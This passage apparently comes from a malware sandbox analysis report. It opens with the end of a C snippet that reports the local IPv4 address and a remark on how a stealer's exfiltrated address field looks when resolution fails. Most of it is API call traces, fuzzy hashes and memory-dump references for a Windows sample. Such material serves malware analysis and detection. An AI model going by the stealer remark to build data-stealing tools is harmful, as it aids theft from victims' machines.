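    int ok = local_ipv4(ip, sizeof ip);
    printf("local IPv4: %s (%s)\n", ip, ok ? "resolved" : "fallback");
    return 0;
}
```

On an analysis VM with no resolver the function reports 0.0.0.0, so a stealer built this way will still send a well-formed (if useless) address field; when reading exfiltrated data, treat 0.0.0.0 as "resolution failed", not as a real interface address.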
                                                                                                                            APIs
                                                                                                                            • timeGetTime.WINMM ref: 00F44F7A
                                                                                                                              • Part of subcall function 00F0049F: timeGetTime.WINMM(?,75C0B400,00EF0E7B), ref: 00F004A3
                                                                                                                             • Sleep.KERNEL32(0000000A), ref: 00F44FA6 (0xA = 10 ms)
                                                                                                                            • EnumThreadWindows.USER32(?,Function_00064F28,00000000), ref: 00F44FCA
                                                                                                                            • FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 00F44FEC
                                                                                                                            • SetActiveWindow.USER32 ref: 00F4500B
                                                                                                                             • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 00F45019 (0xF5 = BM_CLICK)
                                                                                                                             • SendMessageW.USER32(00000010,00000000,00000000), ref: 00F45038 (0x10 = WM_CLOSE)
                                                                                                                             • Sleep.KERNEL32(000000FA), ref: 00F45043 (0xFA = 250 ms)
                                                                                                                            • IsWindow.USER32 ref: 00F4504F
                                                                                                                            • EndDialog.USER32(00000000), ref: 00F45060
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1729732647.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                             • Associated: 00000000.00000002.1729717927.0000000000EE0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.1729788981.0000000000F6F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.1729788981.0000000000F94000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.1729827694.0000000000F9E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.1729851644.0000000000FA7000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_ee0000_3i1gMM8K4z.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
                                                                                                                            • String ID: BUTTON
                                                                                                                            • API String ID: 1194449130-3405671355
                                                                                                                            • Opcode ID: 8a3852325977767c6c7385f3366f333da141b93fc69023f017a6b62a0f31be2f
                                                                                                                            • Instruction ID: 9d6791dcb61c1daf1cf8cebfc2ba70be631050d2e121e2cbafe5f5f1dbdf1284
                                                                                                                            • Opcode Fuzzy Hash: 8a3852325977767c6c7385f3366f333da141b93fc69023f017a6b62a0f31be2f
                                                                                                                            • Instruction Fuzzy Hash: 642192B4A0460DAFE7106F24FC89B263F69EF06B55F0D1024F911D22B5CBA19D58FA62
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 00EE9837: __itow.LIBCMT ref: 00EE9862
                                                                                                                              • Part of subcall function 00EE9837: __swprintf.LIBCMT ref: 00EE98AC
                                                                                                                            • CoInitialize.OLE32(00000000), ref: 00F4D5EA
                                                                                                                            • SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 00F4D67D
                                                                                                                            • SHGetDesktopFolder.SHELL32(?), ref: 00F4D691
                                                                                                                             • CoCreateInstance.OLE32(00F72D7C,00000000,00000001,00F98C1C,?), ref: 00F4D6DD (dwClsContext 0x1 = CLSCTX_INPROC_SERVER)
                                                                                                                            • SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 00F4D74C
                                                                                                                            • CoTaskMemFree.OLE32(?,?), ref: 00F4D7A4
                                                                                                                            • _memset.LIBCMT ref: 00F4D7E1
                                                                                                                            • SHBrowseForFolderW.SHELL32(?), ref: 00F4D81D
                                                                                                                            • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 00F4D840
                                                                                                                            • CoTaskMemFree.OLE32(00000000), ref: 00F4D847
                                                                                                                            • CoTaskMemFree.OLE32(00000000,00000001,00000000), ref: 00F4D87E
                                                                                                                            • CoUninitialize.OLE32(00000001,00000000), ref: 00F4D880
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1729732647.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                             • Associated: 00000000.00000002.1729717927.0000000000EE0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.1729788981.0000000000F6F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.1729788981.0000000000F94000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.1729827694.0000000000F9E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.1729851644.0000000000FA7000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_ee0000_3i1gMM8K4z.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize__itow__swprintf_memset
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1246142700-0
                                                                                                                            • Opcode ID: cd3b1443457db6dbaefb14536dc37fe1e647b1d418e4f540075542ff81aa9bef
                                                                                                                            • Instruction ID: a8e90e29c72421a6d6be27da56697ec0136491efc798db220115addb2f8cc932
                                                                                                                            • Opcode Fuzzy Hash: cd3b1443457db6dbaefb14536dc37fe1e647b1d418e4f540075542ff81aa9bef
                                                                                                                            • Instruction Fuzzy Hash: 39B1F775A00109AFDB04DFA4C888DAEBBF9FF48314F1484A9E919EB261DB30ED45DB50
                                                                                                                            APIs
                                                                                                                             • GetDlgItem.USER32(?,00000001), ref: 00F3C283 (control ID 1 = IDOK)
                                                                                                                             • GetWindowRect.USER32(00000000,?), ref: 00F3C295
                                                                                                                             • MoveWindow.USER32(00000001,0000000A,?,00000001,?,00000000), ref: 00F3C2F3
                                                                                                                             • GetDlgItem.USER32(?,00000002), ref: 00F3C2FE (control ID 2 = IDCANCEL)
                                                                                                                            • GetWindowRect.USER32(00000000,?), ref: 00F3C310
                                                                                                                            • MoveWindow.USER32(00000001,?,00000000,00000001,?,00000000), ref: 00F3C364
                                                                                                                            • GetDlgItem.USER32(?,000003E9), ref: 00F3C372
                                                                                                                            • GetWindowRect.USER32(00000000,?), ref: 00F3C383
                                                                                                                            • MoveWindow.USER32(00000000,0000000A,00000000,?,?,00000000), ref: 00F3C3C6
                                                                                                                            • GetDlgItem.USER32(?,000003EA), ref: 00F3C3D4
                                                                                                                            • MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 00F3C3F1
                                                                                                                            • InvalidateRect.USER32(?,00000000,00000001), ref: 00F3C3FE
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1729732647.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                             • Associated: 00000000.00000002.1729717927.0000000000EE0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.1729788981.0000000000F6F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.1729788981.0000000000F94000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.1729827694.0000000000F9E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.1729851644.0000000000FA7000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_ee0000_3i1gMM8K4z.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Window$ItemMoveRect$Invalidate
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3096461208-0
                                                                                                                            • Opcode ID: eed9436b27e811cf4ea5a20dffa3e3ac87415dfee632ce2562bfa5565cbf62cc
                                                                                                                            • Instruction ID: 4e23856a7c0b1194693c22c9e3562bbd39d177741b1ca43900500abf975b4518
                                                                                                                            • Opcode Fuzzy Hash: eed9436b27e811cf4ea5a20dffa3e3ac87415dfee632ce2562bfa5565cbf62cc
                                                                                                                            • Instruction Fuzzy Hash: 8D514571F00209AFDB18CFA9DD85A6EBBB5FB88720F14812DF515E7290D7B19D049B50
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 00EE1B41: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00EE2036,?,00000000,?,?,?,?,00EE16CB,00000000,?), ref: 00EE1B9A
                                                                                                                            • DestroyWindow.USER32(?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 00EE20D3
                                                                                                                            • KillTimer.USER32(-00000001,?,?,?,?,00EE16CB,00000000,?,?,00EE1AE2,?,?), ref: 00EE216E
                                                                                                                            • DestroyAcceleratorTable.USER32(00000000), ref: 00F1BCA6
                                                                                                                            • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,00EE16CB,00000000,?,?,00EE1AE2,?,?), ref: 00F1BCD7
                                                                                                                            • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,00EE16CB,00000000,?,?,00EE1AE2,?,?), ref: 00F1BCEE
                                                                                                                            • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,00EE16CB,00000000,?,?,00EE1AE2,?,?), ref: 00F1BD0A
                                                                                                                            • DeleteObject.GDI32(00000000), ref: 00F1BD1C
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1729732647.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                             • Associated: 00000000.00000002.1729717927.0000000000EE0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.1729788981.0000000000F6F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.1729788981.0000000000F94000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.1729827694.0000000000F9E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.1729851644.0000000000FA7000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_ee0000_3i1gMM8K4z.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 641708696-0
                                                                                                                            • Opcode ID: ba25eec95db22194e241e90b07b937ce556368b317aa965bd0b6e37a42399513
                                                                                                                            • Instruction ID: 76716e2ba94d2aeaff5839f6f16c22c048c91c987323a55ecaf981eb4401ae12
                                                                                                                            • Opcode Fuzzy Hash: ba25eec95db22194e241e90b07b937ce556368b317aa965bd0b6e37a42399513
                                                                                                                            • Instruction Fuzzy Hash: D661CF71500A58DFCB399F16E948B69B7F5FF41726F10552CE252AA5B0C7B4A880EF80
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 00EE25DB: GetWindowLongW.USER32(?,000000EB), ref: 00EE25EC
                                                                                                                             • GetSysColor.USER32(0000000F), ref: 00EE21D3 (index 0xF = COLOR_3DFACE / COLOR_BTNFACE)
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1729732647.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                             • Associated: 00000000.00000002.1729717927.0000000000EE0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.1729788981.0000000000F6F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.1729788981.0000000000F94000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.1729827694.0000000000F9E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.1729851644.0000000000FA7000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_ee0000_3i1gMM8K4z.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ColorLongWindow
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 259745315-0
                                                                                                                            • Opcode ID: 6f9a06f9e229521cf3d1a70bb46e1533e2ef7d58c2450b5971950f7f4f2980d8
                                                                                                                            • Instruction ID: 40851b19024a99b2518c371bdab9086b6323889a25d3a97b025f4b086374a006
                                                                                                                            • Opcode Fuzzy Hash: 6f9a06f9e229521cf3d1a70bb46e1533e2ef7d58c2450b5971950f7f4f2980d8
                                                                                                                            • Instruction Fuzzy Hash: 3D41A531400188DBDB255F29EC88BB93B69EB0A331F145269FF659A1F1C7718C41EB21
                                                                                                                            APIs
                                                                                                                            • CharLowerBuffW.USER32(?,?,00F6F910), ref: 00F4A90B
                                                                                                                            • GetDriveTypeW.KERNEL32(00000061,00F989A0,00000061), ref: 00F4A9D5
                                                                                                                            • _wcscpy.LIBCMT ref: 00F4A9FF
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1729732647.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                             • Associated: 00000000.00000002.1729717927.0000000000EE0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.1729788981.0000000000F6F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.1729788981.0000000000F94000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.1729827694.0000000000F9E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.1729851644.0000000000FA7000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_ee0000_3i1gMM8K4z.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: BuffCharDriveLowerType_wcscpy
                                                                                                                            • String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
                                                                                                                            • API String ID: 2820617543-1000479233
                                                                                                                            • Opcode ID: 8196a99c2082f77529fe862e8e0539256699b4f09448b3c4d43c5a7fdba4e47d
                                                                                                                            • Instruction ID: 6df6c7965e8f7ccf9642daadc54cd432ab71d784ff21be8e84fd8fa15d4afa40
                                                                                                                            • Opcode Fuzzy Hash: 8196a99c2082f77529fe862e8e0539256699b4f09448b3c4d43c5a7fdba4e47d
                                                                                                                            • Instruction Fuzzy Hash: 6751CD31548341ABC700EF14CC92AAFBBE5EF85754F04482DF896A72A2DB31DD09EA43
APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.1729732647.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
• Associated: 00000000.00000002.1729717927.0000000000EE0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1729788981.0000000000F6F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1729788981.0000000000F94000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1729827694.0000000000F9E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1729851644.0000000000FA7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ee0000_3i1gMM8K4z.jbxd
Similarity
• API ID: __i64tow__itow__swprintf
• String ID: %.15g$0x%p$False$True
• API String ID: 421087845-2263619337
• Opcode ID: be1c315d4b1aeb6f8a05bd6a8f574cd0de26938dc5e410f8b4811ec3dad191da
• Instruction ID: 8845d60a00f43b2606c9910b190ea883d4c6162da5bcccf55a401e609552792a
• Opcode Fuzzy Hash: be1c315d4b1aeb6f8a05bd6a8f574cd0de26938dc5e410f8b4811ec3dad191da
• Instruction Fuzzy Hash: A9410631900209EFEB28DF35DC42EBA73E9EF06310F24447EE449E7292EA35D945AB11
APIs
• _memset.LIBCMT ref: 00F6716A
• CreateMenu.USER32 ref: 00F67185
• SetMenu.USER32(?,00000000), ref: 00F67194
• GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00F67221
• IsMenu.USER32(?), ref: 00F67237
• CreatePopupMenu.USER32 ref: 00F67241
• InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00F6726E
• DrawMenuBar.USER32 ref: 00F67276
Strings
Memory Dump Source
• Source File: 00000000.00000002.1729732647.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
• Associated: 00000000.00000002.1729717927.0000000000EE0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1729788981.0000000000F6F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1729788981.0000000000F94000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1729827694.0000000000F9E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1729851644.0000000000FA7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ee0000_3i1gMM8K4z.jbxd
Similarity
• API ID: Menu$CreateItem$DrawInfoInsertPopup_memset
• String ID: 0$F
• API String ID: 176399719-3044882817
• Opcode ID: 690f32d4b1612b4f8a77312014ff0382fb6acc2add1fdf7e31c9e07393d53c67
• Instruction ID: c3caf590988e2642650da66a37141c26247e112b9f27ebf39ac227ea0d491941
• Opcode Fuzzy Hash: 690f32d4b1612b4f8a77312014ff0382fb6acc2add1fdf7e31c9e07393d53c67
• Instruction Fuzzy Hash: C6416775A01209EFDB20EF64E894E9ABBB5FF09314F140029F916A7361D771AD14EF90
APIs
• MoveWindow.USER32(?,?,?,000000FF,000000FF,00000000,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?), ref: 00F6755E
• CreateCompatibleDC.GDI32(00000000), ref: 00F67565
• SendMessageW.USER32(?,00000173,00000000,00000000), ref: 00F67578
• SelectObject.GDI32(00000000,00000000), ref: 00F67580
• GetPixel.GDI32(00000000,00000000,00000000), ref: 00F6758B
• DeleteDC.GDI32(00000000), ref: 00F67594
• GetWindowLongW.USER32(?,000000EC), ref: 00F6759E
• SetLayeredWindowAttributes.USER32(?,00000000,00000000,00000001), ref: 00F675B2
• DestroyWindow.USER32(?,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?,?,00000000,00000000,?,?), ref: 00F675BE
Strings
Memory Dump Source
• Source File: 00000000.00000002.1729732647.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
• Associated: 00000000.00000002.1729717927.0000000000EE0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1729788981.0000000000F6F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1729788981.0000000000F94000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1729827694.0000000000F9E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1729851644.0000000000FA7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ee0000_3i1gMM8K4z.jbxd
Similarity
• API ID: Window$AttributesCompatibleCreateDeleteDestroyLayeredLongMessageMoveObjectPixelSelectSend
• String ID: static
• API String ID: 2559357485-2160076837
• Opcode ID: 8e3d2c0f3caed9c661663e5e9d4b07ff7edff6689a7812cef43d11e06c9d3914
• Instruction ID: cebdc3d7f7e3860712842a5fdc64ad2310fba76c72c39bfd788a6d7b08f5326a
• Opcode Fuzzy Hash: 8e3d2c0f3caed9c661663e5e9d4b07ff7edff6689a7812cef43d11e06c9d3914
• Instruction Fuzzy Hash: 58319E72504218BBDF11AF64EC08FDB3B69FF09764F150224FA26A20A0C775DC15EBA0
APIs
• _memset.LIBCMT ref: 00F06E3E
  • Part of subcall function 00F08B28: __getptd_noexit.LIBCMT ref: 00F08B28
• __gmtime64_s.LIBCMT ref: 00F06ED7
• __gmtime64_s.LIBCMT ref: 00F06F0D
• __gmtime64_s.LIBCMT ref: 00F06F2A
• __allrem.LIBCMT ref: 00F06F80
• __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00F06F9C
• __allrem.LIBCMT ref: 00F06FB3
• __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00F06FD1
• __allrem.LIBCMT ref: 00F06FE8
• __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00F07006
• __invoke_watson.LIBCMT ref: 00F07077
Memory Dump Source
• Source File: 00000000.00000002.1729732647.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
• Associated: 00000000.00000002.1729717927.0000000000EE0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1729788981.0000000000F6F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1729788981.0000000000F94000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1729827694.0000000000F9E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1729851644.0000000000FA7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ee0000_3i1gMM8K4z.jbxd
Similarity
• API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit__invoke_watson_memset
• String ID:
• API String ID: 384356119-0
• Opcode ID: 1572197e9c4cf49d3ac3c19b6e82465e4eefa01e3d88f7bbd38cf7a66862b9c5
• Instruction ID: 9a2da056b497a3a57a78748c443813806efc6fa0a128d79e4d2fd5576c213b5b
• Opcode Fuzzy Hash: 1572197e9c4cf49d3ac3c19b6e82465e4eefa01e3d88f7bbd38cf7a66862b9c5
• Instruction Fuzzy Hash: 567105B6E00717ABDB14EE68DC41B9AB7A8AF04374F148229F414E72C1E774ED50BB90
APIs
• _memset.LIBCMT ref: 00F42542
• GetMenuItemInfoW.USER32(00FA5890,000000FF,00000000,00000030), ref: 00F425A3
• SetMenuItemInfoW.USER32(00FA5890,00000004,00000000,00000030), ref: 00F425D9
• Sleep.KERNEL32(000001F4), ref: 00F425EB
• GetMenuItemCount.USER32(?), ref: 00F4262F
• GetMenuItemID.USER32(?,00000000), ref: 00F4264B
• GetMenuItemID.USER32(?,-00000001), ref: 00F42675
• GetMenuItemID.USER32(?,?), ref: 00F426BA
• CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00F42700
• GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00F42714
• SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00F42735
Memory Dump Source
• Source File: 00000000.00000002.1729732647.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
• Associated: 00000000.00000002.1729717927.0000000000EE0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1729788981.0000000000F6F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1729788981.0000000000F94000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1729827694.0000000000F9E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1729851644.0000000000FA7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ee0000_3i1gMM8K4z.jbxd
Similarity
• API ID: ItemMenu$Info$CheckCountRadioSleep_memset
• String ID:
• API String ID: 4176008265-0
• Opcode ID: d516ebd2c17970045d0bfb74500d648f4dacb582362ab4a5dc75239adde3e1d3
• Instruction ID: 16af945a34252ccf4011eb4cddc929b18fffffe4a996c3e29c08fcaf58fe2b59
• Opcode Fuzzy Hash: d516ebd2c17970045d0bfb74500d648f4dacb582362ab4a5dc75239adde3e1d3
• Instruction Fuzzy Hash: 9261BCB1900249AFDB51CF64DC88EBEBFB8EB01314F980169FC42A7291D775AD45EB21
APIs
• SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 00F66FA5
• SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 00F66FA8
• GetWindowLongW.USER32(?,000000F0), ref: 00F66FCC
• _memset.LIBCMT ref: 00F66FDD
• SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00F66FEF
• SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 00F67067
Memory Dump Source
• Source File: 00000000.00000002.1729732647.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
• Associated: 00000000.00000002.1729717927.0000000000EE0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1729788981.0000000000F6F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1729788981.0000000000F94000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1729827694.0000000000F9E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1729851644.0000000000FA7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ee0000_3i1gMM8K4z.jbxd
Similarity
• API ID: MessageSend$LongWindow_memset
• String ID:
• API String ID: 830647256-0
• Opcode ID: 69971109a46cf2b1d418ef9a62bf7108d2f494255ef7bceb393a2bea7b70f77d
• Instruction ID: f8b11dc62a164d9a32c03039198477f2831c05072c9a5b34ee4796865e9a805c
• Opcode Fuzzy Hash: 69971109a46cf2b1d418ef9a62bf7108d2f494255ef7bceb393a2bea7b70f77d
• Instruction Fuzzy Hash: 80617AB5900208AFDB11DFA4CC81EEE77F8EB09714F10015AFA15EB2A1D775AD45EBA0
APIs
• SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 00F36BBF
• SafeArrayAllocData.OLEAUT32(?), ref: 00F36C18
• VariantInit.OLEAUT32(?), ref: 00F36C2A
• SafeArrayAccessData.OLEAUT32(?,?), ref: 00F36C4A
• VariantCopy.OLEAUT32(?,?), ref: 00F36C9D
• SafeArrayUnaccessData.OLEAUT32(?), ref: 00F36CB1
• VariantClear.OLEAUT32(?), ref: 00F36CC6
• SafeArrayDestroyData.OLEAUT32(?), ref: 00F36CD3
• SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00F36CDC
• VariantClear.OLEAUT32(?), ref: 00F36CEE
• SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00F36CF9
Memory Dump Source
• Source File: 00000000.00000002.1729732647.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
• Associated: 00000000.00000002.1729717927.0000000000EE0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1729788981.0000000000F6F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1729788981.0000000000F94000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1729827694.0000000000F9E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1729851644.0000000000FA7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ee0000_3i1gMM8K4z.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2706829360-0
                                                                                                                            • Opcode ID: 2950ad06d3f583fb574363d85c202bbe2abfc258221fd6446948ce8cc28aede8
                                                                                                                            • Instruction ID: 8985c3a354d713928009412c2b247bd3d5171ee5260736a0d07fddf46c0dc24a
                                                                                                                            • Opcode Fuzzy Hash: 2950ad06d3f583fb574363d85c202bbe2abfc258221fd6446948ce8cc28aede8
                                                                                                                            • Instruction Fuzzy Hash: CB415071A0011DAFCF04DF69DC449AEBBB9EF48361F00C069E955E7261CB71A945DFA0
                                                                                                                            APIs
                                                                                                                            • WSAStartup.WSOCK32(00000101,?), ref: 00F55793
                                                                                                                            • inet_addr.WSOCK32(?,?,?), ref: 00F557D8
                                                                                                                            • gethostbyname.WSOCK32(?), ref: 00F557E4
                                                                                                                            • IcmpCreateFile.IPHLPAPI ref: 00F557F2
                                                                                                                            • IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 00F55862
                                                                                                                            • IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 00F55878
                                                                                                                            • IcmpCloseHandle.IPHLPAPI(00000000), ref: 00F558ED
                                                                                                                            • WSACleanup.WSOCK32 ref: 00F558F3
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1729732647.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1729717927.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729827694.0000000000F9E000.00000004.00000001.01000000.00000003.sdmpDownload File
